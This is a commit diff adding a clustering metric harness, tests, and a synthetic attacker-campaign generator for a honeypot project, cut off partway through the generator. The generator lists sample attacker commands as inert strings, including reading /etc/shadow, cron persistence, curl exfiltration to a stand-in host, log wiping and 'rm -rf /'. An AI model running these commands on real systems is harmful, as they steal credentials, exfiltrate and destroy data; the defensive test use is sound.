feat(clustering): UKC phase enum + synthetic campaign factory + metric harness

Pre-implementation scaffolding for campaign clustering. The simulator is
the spec — algorithm code follows once fixtures + metrics are stable.

* decnet/clustering/ukc.py — UKCPhase enum (19 phases across In/Through/Out
  stages), OBSERVABLE_PHASES set, stage_of() helper. Vocabulary aligns
  with future MITRE ATT&CK tagging so synthetic data and runtime phase
  inference don't need renaming when TTP-tagging lands.
* tests/factories/campaign_factory.py — YAML DSL parser + deterministic
  generator emitting truth-labeled SyntheticAttacker / SyntheticSession
  records. Validates phase names, warns on unobservable phases, supports
  multi-campaign + noise corpora.
* tests/clustering/metrics.py — pure-Python ARI / homogeneity /
  completeness / singleton_recall (no sklearn dep). Decided before any
  algorithm exists, on purpose.
* tests/fixtures/campaigns/lone_wolf.{yaml,expected.yaml} — fixture 3
  from the design doc; simplest of the six, exercises the full pipeline
  with an identity-clusterer placeholder.
* development/CAMPAIGN_CLUSTERING.md — design spec for the feature.
* development/DEVELOPMENT_V2.md — note on DSL evolution path
  (concurrent phases, multi-actor per phase) deferred post-v1.
This commit is contained in:
2026-04-26 06:29:10 -04:00
parent 3eb67c9400
commit 00254629f8
13 changed files with 1227 additions and 0 deletions

View File

179
tests/clustering/metrics.py Normal file
View File

@@ -0,0 +1,179 @@
"""
Clustering metric harness — see development/CAMPAIGN_CLUSTERING.md §3.
Decided BEFORE any clustering algorithm exists, on purpose: if the
metrics get picked after seeing results, they'll flatter whatever the
algorithm happens to produce.
Four metrics, none on its own sufficient:
* Adjusted Rand Index — headline number, chance-corrected agreement
between predicted clusters and ground truth.
* Homogeneity — each predicted cluster contains only one true class.
Catches FALSE MERGES (campaigns wrongly fused).
* Completeness — every member of a true class lands in the same
predicted cluster. Catches FALSE SPLITS (one campaign wrongly torn
apart).
* Singleton recall — fraction of ground-truth singletons (lone wolves,
background noise) that are kept singleton by the clusterer.
Implemented from first principles in pure Python so the test harness
doesn't pull sklearn/numpy into the runtime dependency surface.
"""
from __future__ import annotations
import math
from collections import Counter, defaultdict
def _comb2(n: int) -> int:
    """Count the unordered pairs that can be drawn from ``n`` items, i.e. C(n, 2).

    Fewer than two items cannot form a pair, so the result is 0.
    """
    if n < 2:
        return 0
    return (n * (n - 1)) // 2
def adjusted_rand_index(truth: dict[str, str], pred: dict[str, str]) -> float:
    """
    Chance-corrected pair-counting agreement between two labelings.

    ``truth`` and ``pred`` each map item_id -> cluster_id and must cover
    exactly the same item ids.

    Returns 1.0 when the two partitions coincide (label names are
    irrelevant), roughly 0.0 for chance-level agreement, and a negative
    value when agreement is worse than chance. Fewer than two items is
    treated as trivial agreement (1.0).

    Raises:
        ValueError: if the two mappings do not share the same item ids.
    """
    if set(truth) != set(pred):
        raise ValueError(
            "ARI requires identical item sets in truth and pred "
            f"(missing in pred: {set(truth) - set(pred)}, "
            f"missing in truth: {set(pred) - set(truth)})"
        )

    n_items = len(truth)
    if n_items < 2:
        return 1.0

    # Contingency cells keyed by (predicted cluster, true class).
    cells = Counter((pred[item], label) for item, label in truth.items())
    cluster_sizes = Counter(pred.values())
    class_sizes = Counter(truth.values())

    pairs_together = sum(map(_comb2, cells.values()))
    pairs_in_clusters = sum(map(_comb2, cluster_sizes.values()))
    pairs_in_classes = sum(map(_comb2, class_sizes.values()))
    all_pairs = _comb2(n_items)

    if all_pairs:
        expected_index = (pairs_in_clusters * pairs_in_classes) / all_pairs
    else:
        expected_index = 0.0
    max_index = (pairs_in_clusters + pairs_in_classes) / 2

    if max_index == expected_index:
        # Equality only happens when both labelings are all-singletons or
        # both are one big cluster, i.e. the partitions are identical, so
        # the score is defined as 1.0 instead of dividing by zero.
        return 1.0
    return (pairs_together - expected_index) / (max_index - expected_index)
def _entropy(counts: list[int], total: int) -> float:
    """Shannon entropy (natural log) of the distribution ``counts / total``.

    Zero counts contribute nothing; a zero ``total`` yields 0.0.
    """
    if total == 0:
        return 0.0
    acc = 0.0
    for count in counts:
        if count:
            prob = count / total
            acc -= prob * math.log(prob)
    return acc
def _conditional_entropy(
    contingency: dict[tuple[str, str], int],
    given_counts: dict[str, int],
    total: int,
) -> float:
    """Conditional entropy H(rows | cols) of a contingency table.

    ``contingency`` is keyed by ``(row, col)``; ``given_counts`` holds the
    size of each column (the variable being conditioned on) and ``total``
    is the number of items. Each column's entropy is weighted by the
    column's share of ``total``.
    """
    if total == 0:
        return 0.0

    # Gather the cell counts that belong to each conditioning column.
    cells_by_col: dict[str, list[int]] = defaultdict(list)
    for (_row, col), count in contingency.items():
        cells_by_col[col].append(count)

    acc = 0.0
    for col, cells in cells_by_col.items():
        col_size = given_counts[col]
        if col_size != 0:
            acc += (col_size / total) * _entropy(cells, col_size)
    return acc
def homogeneity(truth: dict[str, str], pred: dict[str, str]) -> float:
    """
    1 - H(truth | pred) / H(truth). 1.0 = each predicted cluster
    contains only members of a single true class (no false merges).

    Both args map item_id -> cluster_id and must cover exactly the same
    item ids. An empty input, or a truth labeling with a single class
    (zero entropy), scores 1.0.

    Raises:
        ValueError: if truth and pred do not share the same item ids.
    """
    # Validate up front: extra ids in pred would otherwise inflate the
    # cluster sizes used as weights and silently skew the score, while
    # missing ids would surface as a bare KeyError.
    if set(truth) != set(pred):
        raise ValueError(
            "homogeneity requires identical item sets in truth and pred "
            f"(missing in pred: {set(truth) - set(pred)}, "
            f"missing in truth: {set(pred) - set(truth)})"
        )
    n = len(truth)
    if n == 0:
        return 1.0
    # Rows are true classes, columns are predicted clusters.
    contingency: dict[tuple[str, str], int] = defaultdict(int)
    for item, t in truth.items():
        contingency[(t, pred[item])] += 1
    truth_counts = Counter(truth.values())
    pred_counts = Counter(pred.values())
    h_truth = _entropy(list(truth_counts.values()), n)
    if h_truth == 0:
        return 1.0
    h_truth_given_pred = _conditional_entropy(contingency, dict(pred_counts), n)
    return 1.0 - (h_truth_given_pred / h_truth)
def completeness(truth: dict[str, str], pred: dict[str, str]) -> float:
    """
    1 - H(pred | truth) / H(pred). 1.0 = all members of each true class
    are assigned to the same predicted cluster (no false splits).

    Both args map item_id -> cluster_id and must cover exactly the same
    item ids. An empty input, or a prediction with a single cluster
    (zero entropy), scores 1.0.

    Raises:
        ValueError: if truth and pred do not share the same item ids.
    """
    # Validate up front: extra ids in pred would otherwise change H(pred)
    # without appearing in the contingency table, and missing ids would
    # surface as a bare KeyError.
    if set(truth) != set(pred):
        raise ValueError(
            "completeness requires identical item sets in truth and pred "
            f"(missing in pred: {set(truth) - set(pred)}, "
            f"missing in truth: {set(pred) - set(truth)})"
        )
    n = len(truth)
    if n == 0:
        return 1.0
    # Rows are predicted clusters, columns are true classes.
    contingency: dict[tuple[str, str], int] = defaultdict(int)
    for item, t in truth.items():
        contingency[(pred[item], t)] += 1
    pred_counts = Counter(pred.values())
    truth_counts = Counter(truth.values())
    h_pred = _entropy(list(pred_counts.values()), n)
    if h_pred == 0:
        return 1.0
    h_pred_given_truth = _conditional_entropy(contingency, dict(truth_counts), n)
    return 1.0 - (h_pred_given_truth / h_pred)
def singleton_recall(truth: dict[str, str], pred: dict[str, str]) -> float:
    """
    Fraction of ground-truth singletons that the clusterer kept singleton.

    A "true singleton" is an item whose truth-campaign has exactly one
    member (lone wolves, background noise scanners). The metric exists
    because ARI/homogeneity/completeness all dilute the cost of a
    clusterer that absorbs noise into real campaigns — and noise
    absorption is the failure mode that makes campaign attribution
    useless in practice.

    Both args map item_id -> cluster_id and must cover exactly the same
    item ids. Returns 1.0 when the truth contains no singletons.

    Raises:
        ValueError: if truth and pred do not share the same item ids.
    """
    # Same contract as adjusted_rand_index: refuse mismatched inputs
    # instead of failing with a bare KeyError or counting cluster sizes
    # over items the truth knows nothing about.
    if set(truth) != set(pred):
        raise ValueError(
            "singleton_recall requires identical item sets in truth and pred "
            f"(missing in pred: {set(truth) - set(pred)}, "
            f"missing in truth: {set(pred) - set(truth)})"
        )
    truth_counts = Counter(truth.values())
    true_singletons = [item for item, t in truth.items() if truth_counts[t] == 1]
    if not true_singletons:
        return 1.0
    pred_counts = Counter(pred.values())
    # A singleton is "kept" only if its predicted cluster has no other member.
    kept = sum(1 for item in true_singletons if pred_counts[pred[item]] == 1)
    return kept / len(true_singletons)
def score(truth: dict[str, str], pred: dict[str, str]) -> dict[str, float]:
    """Compute all four harness metrics for one (truth, pred) pair.

    The result is keyed by metric name, ready for fixture reports.
    """
    report: dict[str, float] = {}
    report["adjusted_rand_index"] = adjusted_rand_index(truth, pred)
    report["homogeneity"] = homogeneity(truth, pred)
    report["completeness"] = completeness(truth, pred)
    report["singleton_recall"] = singleton_recall(truth, pred)
    return report

View File

@@ -0,0 +1,112 @@
"""Determinism + DSL-validation tests for the synthetic campaign factory."""
from __future__ import annotations
import pytest
from decnet.clustering.ukc import UKCPhase
from tests.factories.campaign_factory import (
DSLValidationError,
generate,
)
def _minimal_spec() -> dict:
    """Build a fresh single-campaign spec: one actor, one delivery phase, one day.

    A new dict is returned on every call so tests can mutate it freely.
    """
    actor = {"id": "a-1", "asn": 64512}
    phase = {"name": "delivery", "actor": "a-1"}
    campaign = {
        "id": "c-test",
        "actors": [actor],
        "phases": [phase],
        "duration_days": 1,
    }
    return {"campaign": campaign}
def test_generation_is_deterministic_given_seed() -> None:
    """Two runs over the same spec and seed must yield identical IDs."""
    spec = _minimal_spec()
    first, second = generate(spec, seed=42), generate(spec, seed=42)

    # The IDs themselves come from the seeded RNG, so equality has to hold
    # on the ID values, not just on the shape of the corpus.
    first_attacker_ids = [att.attacker_id for att in first.attackers]
    second_attacker_ids = [att.attacker_id for att in second.attackers]
    assert first_attacker_ids == second_attacker_ids

    first_session_ids = [s.session_id for s in first.sessions]
    second_session_ids = [s.session_id for s in second.sessions]
    assert first_session_ids == second_session_ids
def test_different_seeds_produce_different_ids() -> None:
    """Changing only the seed must change the first attacker's ID."""
    spec = _minimal_spec()
    id_seed_1 = generate(spec, seed=1).attackers[0].attacker_id
    id_seed_2 = generate(spec, seed=2).attackers[0].attacker_id
    assert id_seed_1 != id_seed_2
def test_truth_labels_match_dsl() -> None:
    """Truth labels on the attacker row must echo the ids declared in the spec."""
    corpus = generate(_minimal_spec(), seed=0)
    attacker = corpus.attackers[0]
    assert attacker.truth_campaign_id == "c-test"
    assert attacker.truth_actor_id == "a-1"
    # truth_labels() is the mapping handed to the metric harness.
    assert corpus.truth_labels()[attacker.attacker_id] == "c-test"
def test_unobservable_phase_emits_no_events() -> None:
    """A pre-target phase contributes no sessions; only delivery does."""
    spec = _minimal_spec()
    # "reconnaissance" is the pre-target (unobservable) phase under test.
    spec["campaign"]["phases"] = [
        {"name": phase_name, "actor": "a-1"}
        for phase_name in ("reconnaissance", "delivery")
    ]
    corpus = generate(spec, seed=0)
    observed_phases = [s.phase for s in corpus.sessions]
    assert all(phase == UKCPhase.DELIVERY for phase in observed_phases)
    assert len(corpus.sessions) == 1
def test_unknown_phase_name_raises() -> None:
    """A phase name outside the UKC vocabulary is a hard validation error."""
    spec = _minimal_spec()
    bogus_phase = {"name": "make_coffee", "actor": "a-1"}
    spec["campaign"]["phases"] = [bogus_phase]
    with pytest.raises(DSLValidationError, match="unknown UKC phase"):
        generate(spec, seed=0)
def test_phase_referencing_unknown_actor_raises() -> None:
    """A phase that names an undeclared actor is a hard validation error."""
    spec = _minimal_spec()
    orphan_phase = {"name": "delivery", "actor": "ghost"}
    spec["campaign"]["phases"] = [orphan_phase]
    with pytest.raises(DSLValidationError, match="unknown actor"):
        generate(spec, seed=0)
def test_noise_scanners_are_truth_singletons() -> None:
    """Each noise scanner must carry its own distinct truth campaign id."""
    noise_block = {"scanner_count": 5}
    spec = {"corpus": {"campaigns": [_minimal_spec()], "noise": noise_block}}
    corpus = generate(spec, seed=0)
    # One campaign actor plus five scanners -> six distinct truth campaigns.
    distinct_campaigns = set()
    for attacker in corpus.attackers:
        distinct_campaigns.add(attacker.truth_campaign_id)
    assert len(distinct_campaigns) == 6
def test_multi_actor_campaign_shares_campaign_id() -> None:
    """Every actor of one campaign must map to the same truth campaign id."""
    actors = [{"id": actor_id, "asn": 14061} for actor_id in ("a-1", "a-2")]
    phases = [
        {"name": "delivery", "actor": "a-1"},
        {"name": "discovery", "actor": "a-2"},
    ]
    spec = {
        "campaign": {
            "id": "c-shared",
            "actors": actors,
            "phases": phases,
            "duration_days": 1,
        }
    }
    labels = generate(spec, seed=0).truth_labels()
    # Both attacker rows have to share one truth_campaign_id; the
    # multi_operator fixture (fixture 5) depends on this property.
    assert set(labels.values()) == {"c-shared"}

View File

@@ -0,0 +1,92 @@
"""
End-to-end pipeline test for fixture 3 (lone_wolf).
Loads the YAML spec, runs the synthetic generator, applies a placeholder
identity clusterer (each attacker → its own cluster), scores against
the expected bounds. This is the simplest of the six fixtures and is
deliberately the first one wired up — its ground truth is all
singletons, so an identity clusterer trivially passes, which proves the
DSL→factory→metrics pipeline works before any real algorithm is built.
Once the connected-components clusterer (CAMPAIGN_CLUSTERING.md §4)
lands, this test will swap the placeholder for the real implementation
and the same fixture must continue to pass.
"""
from __future__ import annotations
from pathlib import Path
import pytest
import yaml
from tests.clustering.metrics import score
from tests.factories.campaign_factory import GeneratedCorpus, generate, load_yaml
# Campaign fixtures live in ../fixtures/campaigns relative to this test module.
FIXTURE_DIR = Path(__file__).parent.parent.joinpath("fixtures", "campaigns")
def _identity_clusterer(corpus: GeneratedCorpus) -> dict[str, str]:
    """Placeholder clusterer: put every attacker in a cluster of its own.

    Returns attacker_id -> ``cluster-<attacker_id>``; this is exactly
    right when the ground truth is all singletons, as in lone_wolf.
    """
    assignment: dict[str, str] = {}
    for attacker in corpus.attackers:
        assignment[attacker.attacker_id] = f"cluster-{attacker.attacker_id}"
    return assignment
def test_lone_wolf_pipeline_passes_bounds() -> None:
    """Run lone_wolf through factory -> identity clusterer -> metrics and
    check every metric against the ``min`` bound in lone_wolf.expected.yaml.

    All violated bounds are collected so a single failure message lists
    every metric that fell short.
    """
    spec = load_yaml(FIXTURE_DIR / "lone_wolf.yaml")
    # Decode explicitly as UTF-8 (the fixture comments contain non-ASCII
    # characters) instead of relying on the platform default encoding;
    # load_yaml reads the spec file the same way.
    bounds_text = (FIXTURE_DIR / "lone_wolf.expected.yaml").read_text(encoding="utf-8")
    bounds = yaml.safe_load(bounds_text)
    corpus = generate(spec, seed=0)
    truth = corpus.truth_labels()
    pred = _identity_clusterer(corpus)
    metrics = score(truth, pred)
    failures = []
    for name, bound in bounds.items():
        observed = metrics[name]
        if observed < bound["min"]:
            failures.append(f"{name}={observed:.3f} < min {bound['min']:.3f}")
    assert not failures, "fixture bounds violated: " + "; ".join(failures)
def test_lone_wolf_corpus_shape() -> None:
    """Shape check: the wolf plus 8 noise scanners give 9 attackers and 9 sessions."""
    corpus = generate(load_yaml(FIXTURE_DIR / "lone_wolf.yaml"), seed=0)
    attacker_count = len(corpus.attackers)
    session_count = len(corpus.sessions)
    assert attacker_count == 9
    assert session_count == 9
    # Nobody shares a truth campaign: every attacker is a truth-singleton.
    distinct_campaigns = set()
    for attacker in corpus.attackers:
        distinct_campaigns.add(attacker.truth_campaign_id)
    assert len(distinct_campaigns) == 9
def test_identity_clusterer_fails_on_a_real_campaign() -> None:
    """
    Harness self-check, not a clusterer test.

    On a genuine two-actor campaign the placeholder identity clusterer
    tears the campaign into one-member clusters, so completeness must
    fall below 1.0. If it did not, the metrics would be blind to false
    splits, which is what fixtures 4 and 5 of the design doc rely on.
    """
    actors = [{"id": actor_id, "asn": 14061} for actor_id in ("a-1", "a-2")]
    phases = [
        {"name": "delivery", "actor": "a-1"},
        {"name": "discovery", "actor": "a-2"},
    ]
    spec = {
        "campaign": {
            "id": "c-real",
            "actors": actors,
            "phases": phases,
            "duration_days": 1,
        }
    }
    corpus = generate(spec, seed=0)
    metrics = score(corpus.truth_labels(), _identity_clusterer(corpus))
    # One true campaign spread over two clusters: a false split, so
    # completeness has to drop while homogeneity stays perfect.
    assert metrics["completeness"] < 1.0
    assert metrics["homogeneity"] == pytest.approx(1.0)  # splits only, no false merges

View File

@@ -0,0 +1,76 @@
"""Sanity tests for the clustering metric harness."""
from __future__ import annotations
import pytest
from tests.clustering.metrics import (
adjusted_rand_index,
completeness,
homogeneity,
score,
singleton_recall,
)
def test_perfect_agreement_scores_one() -> None:
    """Identical partitions score 1.0 on every metric, whatever the label names."""
    truth = {"a": "C1", "b": "C1", "c": "C2", "d": "C2"}
    # Same grouping under different names: clusterers do not preserve
    # label names, so an isomorphic relabeling must still be perfect.
    renaming = {"C1": "X", "C2": "Y"}
    pred = {item: renaming[label] for item, label in truth.items()}
    result = score(truth, pred)
    assert result["adjusted_rand_index"] == pytest.approx(1.0)
    assert result["homogeneity"] == pytest.approx(1.0)
    assert result["completeness"] == pytest.approx(1.0)
    assert result["singleton_recall"] == pytest.approx(1.0)
def test_all_singletons_perfect() -> None:
    """All-singleton truth matched by all-singleton prediction is a perfect score."""
    truth = dict(zip("abc", "ABC"))
    pred = dict(zip("abc", "123"))
    result = score(truth, pred)
    assert result["singleton_recall"] == pytest.approx(1.0)
    assert result["adjusted_rand_index"] == pytest.approx(1.0)
def test_false_merge_drops_homogeneity() -> None:
    """Fusing two distinct campaigns zeroes homogeneity but not completeness."""
    truth = {"a": "C1", "b": "C2"}
    merged = dict.fromkeys(truth, "X")  # both campaigns land in one cluster
    assert homogeneity(truth, merged) == pytest.approx(0.0)
    # Each true class still sits inside a single cluster, so completeness holds.
    assert completeness(truth, merged) == pytest.approx(1.0)
def test_false_split_drops_completeness() -> None:
    """Tearing one campaign into two clusters zeroes completeness but not homogeneity."""
    truth = dict.fromkeys(("a", "b"), "C1")
    split = {"a": "X", "b": "Y"}  # one campaign spread over two clusters
    assert completeness(truth, split) == pytest.approx(0.0)
    assert homogeneity(truth, split) == pytest.approx(1.0)
def test_singleton_recall_penalises_noise_absorption() -> None:
    """Absorbing lone wolves into a campaign must drive singleton recall to 0."""
    # Three lone wolves next to one genuine two-member campaign.
    truth = {"w1": "wolf1", "w2": "wolf2", "w3": "wolf3", "c1": "C", "c2": "C"}

    # Worst case: everything is swallowed by a single cluster.
    absorbed = {item: "BIG" for item in truth}
    assert singleton_recall(truth, absorbed) == pytest.approx(0.0)

    # Wolves left alone score 1.0 here, whatever happens to the campaign.
    wolves_kept = {"w1": "1", "w2": "2", "w3": "3", "c1": "C", "c2": "C"}
    assert singleton_recall(truth, wolves_kept) == pytest.approx(1.0)
def test_mismatched_item_sets_raises() -> None:
    """ARI must reject truth/pred mappings that cover different items."""
    truth_only = {"a": "X"}
    pred_only = {"b": "Y"}
    with pytest.raises(ValueError):
        adjusted_rand_index(truth_only, pred_only)
def test_random_labels_low_ari() -> None:
    """A prediction unrelated to the truth must not earn a high ARI."""
    item_ids = [f"i{n}" for n in range(20)]
    # Truth: five classes of four consecutive items each.
    truth = {item: f"C{n // 4}" for n, item in enumerate(item_ids)}
    # Prediction: five buckets assigned in an order that ignores the truth.
    pred = {item: f"X{(n * 7) % 5}" for n, item in enumerate(item_ids)}
    observed = adjusted_rand_index(truth, pred)
    # Deliberately loose: chance correction should keep this far from 1.
    assert observed < 0.3

View File

View File

@@ -0,0 +1,381 @@
"""
Synthetic campaign generator — see development/CAMPAIGN_CLUSTERING.md.
Reads a YAML campaign DSL describing actors, UKC phases, and tool
signatures, and emits truth-labeled SyntheticAttacker / SyntheticSession
records for the clustering test harness.
Truth labels (`truth_campaign_id`, `truth_actor_id`) are part of the
emitted records so the metric harness can score predicted clusters
against ground truth without re-parsing the DSL. Production code that
later writes the same shape into real DB tables MUST strip these fields
before clustering runs — otherwise the algorithm trivially passes by
reading the answer key.
Determinism: given the same YAML and seed, two runs produce identical
records (including IDs). This is a load-bearing property — fixture
expectations are checked against the same seed every CI run.
"""
from __future__ import annotations
import hashlib
import random
import uuid
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from pathlib import Path
from typing import Any
import yaml
from decnet.clustering.ukc import OBSERVABLE_PHASES, UKCPhase
@dataclass
class SyntheticSession:
    """One synthetic attacker session against a single decky.

    The ``truth_*`` fields are the ground-truth labels used for scoring.
    """

    # Identity and placement.
    session_id: str
    attacker_id: str
    decky_id: str
    # Timing.
    started_at: datetime
    duration_s: float
    # What was observed during the session.
    phase: UKCPhase
    commands: list[str]
    credentials_tried: list[tuple[str, str]]
    payload_hash: str | None
    c2_callback: str | None
    # Ground truth (answer key).
    truth_campaign_id: str
    truth_actor_id: str
@dataclass
class SyntheticAttacker:
    """One synthetic attacker row together with the sessions attributed to it.

    The ``truth_*`` fields are the ground-truth labels used for scoring.
    """

    # Identity and network-level fingerprints.
    attacker_id: str
    ip: str
    asn: int
    ja3: str | None
    hassh: str | None
    # Observation window.
    first_seen: datetime
    last_seen: datetime
    # Ground truth (answer key).
    truth_campaign_id: str
    truth_actor_id: str
    # Every instance gets its own list, filled in as sessions are generated.
    sessions: list[SyntheticSession] = field(default_factory=list)
@dataclass
class GeneratedCorpus:
    """Result of a factory run: the attackers plus a flat view of their sessions."""

    attackers: list[SyntheticAttacker]
    # Flat list holding every session of every attacker, for convenience.
    sessions: list[SyntheticSession]

    def truth_labels(self) -> dict[str, str]:
        """Map attacker_id -> truth_campaign_id: the oracle predictions are scored against."""
        labels: dict[str, str] = {}
        for attacker in self.attackers:
            labels[attacker.attacker_id] = attacker.truth_campaign_id
        return labels
# ─── Phase defaults ─────────────────────────────────────────────────────────
# Default command list per UKC phase, used when the DSL does not give
# tool_signature commands for that phase. Keeps fixtures terse without
# making the factory invent data ad-hoc per call.
#
# The entries are plain strings copied onto SyntheticSession.commands;
# nothing in this module executes them. An empty list means the phase
# carries no shell commands by default.
_PHASE_DEFAULT_COMMANDS: dict[UKCPhase, list[str]] = {
    UKCPhase.DELIVERY: [],  # delivery is mostly network-level, no shell commands
    UKCPhase.EXPLOITATION: [],
    UKCPhase.DISCOVERY: ["whoami", "id", "uname -a", "ip route", "arp -a", "cat /etc/passwd"],
    UKCPhase.CREDENTIAL_ACCESS: ["cat /etc/shadow", "find / -name id_rsa", "cat ~/.ssh/known_hosts"],
    UKCPhase.PERSISTENCE: ["crontab -l", "echo '* * * * * /tmp/.x' | crontab -", "cat ~/.ssh/authorized_keys"],
    UKCPhase.LATERAL_MOVEMENT: ["ssh -i /tmp/.k root@10.0.0.5", "scp /tmp/.x root@10.0.0.5:/tmp/"],
    UKCPhase.COLLECTION: ["tar czf /tmp/loot.tgz /var/lib/mysql /home"],
    UKCPhase.EXFILTRATION: ["curl -T /tmp/loot.tgz https://drop.example/"],
    UKCPhase.EXECUTION: ["./payload"],
    UKCPhase.PRIVILEGE_ESCALATION: ["sudo -l", "find / -perm -u=s 2>/dev/null"],
    UKCPhase.DEFENSE_EVASION: ["history -c", "rm -rf /var/log/wtmp"],
    UKCPhase.COMMAND_AND_CONTROL: [],  # beaconing observed at network layer
    UKCPhase.PIVOTING: [],
    UKCPhase.IMPACT: ["rm -rf /"],
    UKCPhase.OBJECTIVES: [],
}
# ─── DSL parsing ────────────────────────────────────────────────────────────
class DSLValidationError(ValueError):
    """Signals a malformed campaign YAML/spec, e.g. an unknown phase or actor reference."""
def _validate_campaign_spec(spec: dict[str, Any]) -> list[str]:
    """
    Validate one ``{"campaign": {...}}`` wrapper before generation.

    Hard errors raise; soft issues are returned as human-readable
    warning strings so the caller can decide what to do with them.

    Args:
        spec: mapping with a top-level ``campaign`` key.

    Returns:
        Warnings for phases that are not observable (no events will be
        emitted for them) and for phases that omit ``actor`` in a
        multi-actor campaign (they fall back to the first declared actor).

    Raises:
        DSLValidationError: missing ``campaign``/``id``/``actors``/``phases``,
            an actor without ``id``, no actors at all, a phase without
            ``name``, an unknown UKC phase name, or a phase referencing an
            undeclared actor.
    """
    if "campaign" not in spec:
        raise DSLValidationError("missing top-level 'campaign' key")
    c = spec["campaign"]
    if not isinstance(c, dict):
        raise DSLValidationError("'campaign' must be a mapping")
    for key in ("id", "actors", "phases"):
        if key not in c:
            raise DSLValidationError(f"campaign missing required key: {key}")

    # Report malformed actor entries as DSL errors instead of letting a
    # bare KeyError/TypeError escape; a null ``actors:`` counts as empty.
    actor_ids = set()
    for i, actor in enumerate(c["actors"] or []):
        if not isinstance(actor, dict) or "id" not in actor:
            raise DSLValidationError(f"actor[{i}] missing 'id'")
        actor_ids.add(actor["id"])
    if not actor_ids:
        raise DSLValidationError("campaign must declare at least one actor")

    warnings: list[str] = []
    for i, ph in enumerate(c["phases"] or []):
        if not isinstance(ph, dict) or "name" not in ph:
            raise DSLValidationError(f"phase[{i}] missing 'name'")
        try:
            phase_enum = UKCPhase(ph["name"])
        except ValueError as exc:
            raise DSLValidationError(
                f"phase[{i}] has unknown UKC phase '{ph['name']}'"
            ) from exc
        if phase_enum not in OBSERVABLE_PHASES:
            warnings.append(
                f"phase '{ph['name']}' is pre-target / unobservable from a "
                f"honeypot; no events will be emitted for it"
            )
        # Single-actor campaigns can omit phase.actor; multi-actor should
        # specify it. Omission is only warned about (not rejected) so specs
        # that were accepted before keep loading.
        if "actor" not in ph:
            if len(actor_ids) > 1:
                warnings.append(
                    f"phase[{i}] omits 'actor' in a multi-actor campaign; "
                    f"the first declared actor will be used"
                )
        elif ph["actor"] not in actor_ids:
            raise DSLValidationError(
                f"phase[{i}] references unknown actor '{ph['actor']}'"
            )
    return warnings
# ─── Generator ──────────────────────────────────────────────────────────────
def _stable_uuid(rng: random.Random, prefix: str) -> str:
    """Return ``<prefix>-<uuid>`` where the UUID is built from 16 bytes drawn from ``rng``.

    The same RNG state always gives the same identifier.
    """
    seeded = uuid.UUID(int=int.from_bytes(rng.randbytes(16), "big"))
    return f"{prefix}-{seeded}"
def _stable_ip(rng: random.Random) -> str:
    """Draw a dotted-quad IPv4 address from ``rng`` by rejection sampling.

    The first octet is 1..223 (so nothing in 0/8 or 224 and above);
    candidates in 10/8, 127/8, 172.16/12 and 192.168/16 are discarded
    and redrawn. The last octet is kept within 1..254.
    """
    while True:
        first = rng.randint(1, 223)
        if first == 10 or first == 127:
            continue
        second = rng.randint(0, 255)
        in_172_private = first == 172 and 16 <= second <= 31
        in_192_private = first == 192 and second == 168
        if in_172_private or in_192_private:
            continue
        third = rng.randint(0, 255)
        fourth = rng.randint(1, 254)
        return ".".join(str(octet) for octet in (first, second, third, fourth))
def _payload_hash(seed: str) -> str:
    """Return the hex SHA-256 digest of ``seed`` (encoded with the default UTF-8)."""
    digest = hashlib.sha256()
    digest.update(seed.encode())
    return digest.hexdigest()
def _hour_to_offset(rng: random.Random, day_start: datetime, hour: int, jitter_s: int) -> datetime:
    """Pick a timestamp inside (roughly) the given hour of ``day_start``'s day.

    Starts at the top of ``hour`` and adds two draws from ``rng``: a
    symmetric jitter in ``[-jitter_s, jitter_s]`` seconds and an offset of
    0..3600 seconds, so the result can land slightly outside the hour.
    """
    top_of_hour = day_start.replace(hour=hour, minute=0, second=0, microsecond=0)
    # Draw order matters for determinism: jitter first, then the in-hour offset.
    jitter = rng.randint(-jitter_s, jitter_s)
    within_hour = rng.randint(0, 3600)
    return top_of_hour + timedelta(seconds=jitter + within_hour)
def generate(spec: dict[str, Any], *, seed: int = 0) -> GeneratedCorpus:
    """
    Produce a deterministic synthetic corpus from a parsed YAML spec.

    The spec mirrors the schema documented in CAMPAIGN_CLUSTERING.md.
    Multiple campaigns + a noise block can be combined by wrapping them
    in a top-level `corpus:` key; otherwise a single `campaign:` is
    expected.

    Args:
        spec: parsed DSL, either ``{"campaign": {...}}`` or
            ``{"corpus": {"campaigns": [...], "noise": {...}}}``.
        seed: seed for the RNG that drives every generated value; the
            same spec and seed give the same corpus.

    Returns:
        GeneratedCorpus with campaign attackers first (in declaration
        order) followed by noise scanners.

    Raises:
        DSLValidationError: if any campaign fails validation.
    """
    import logging  # local import keeps this function self-contained

    log = logging.getLogger(__name__)
    rng = random.Random(seed)
    campaigns: list[dict[str, Any]]
    noise_cfg: dict[str, Any]
    if "corpus" in spec:
        # YAML turns an empty `corpus:` / `campaigns:` / `noise:` into None;
        # treat each of those as "nothing declared" instead of crashing.
        corpus_cfg = spec["corpus"] or {}
        campaigns = corpus_cfg.get("campaigns") or []
        noise_cfg = corpus_cfg.get("noise") or {}
    else:
        campaigns = [spec]
        noise_cfg = {}
    attackers: list[SyntheticAttacker] = []
    sessions: list[SyntheticSession] = []
    for c_wrapper in campaigns:
        # Validation warnings (e.g. unobservable phases) go to the module
        # logger so they are visible rather than silently dropped.
        for warning in _validate_campaign_spec(c_wrapper):
            log.warning("campaign DSL: %s", warning)
        _emit_campaign(c_wrapper["campaign"], rng, attackers, sessions)
    _emit_noise(noise_cfg, rng, attackers, sessions)
    return GeneratedCorpus(attackers=attackers, sessions=sessions)
def _emit_campaign(
    c: dict[str, Any],
    rng: random.Random,
    attackers: list[SyntheticAttacker],
    sessions: list[SyntheticSession],
) -> None:
    """
    Append one campaign's attackers and sessions to the output lists.

    One SyntheticAttacker is created per declared actor. Phases are then
    walked in declared order; every observable phase emits
    ``target_selector.count`` sessions (default 1) for its actor. All
    randomness is drawn from ``rng`` in a fixed order, so the output is
    reproducible for a given RNG state.

    Args:
        c: the mapping found under the spec's ``campaign`` key.
        rng: seeded RNG shared by the whole generation run.
        attackers: output list; new attacker rows are appended in place.
        sessions: output list; new sessions are appended in place.
    """
    campaign_id = c["id"]
    duration_days = int(c.get("duration_days", 1))
    pause_windows: list[tuple[int, int]] = [
        tuple(p) for p in c.get("pause_windows", [])  # type: ignore[misc]
    ]

    def _is_paused(day: int) -> bool:
        """True when ``day`` falls inside any (inclusive) pause window."""
        return any(start <= day <= end for start, end in pause_windows)

    # Days a session may be moved to when its drawn day is paused. This
    # depends only on the campaign, so it is computed once up front.
    unpaused_days = [d for d in range(duration_days) if not _is_paused(d)]

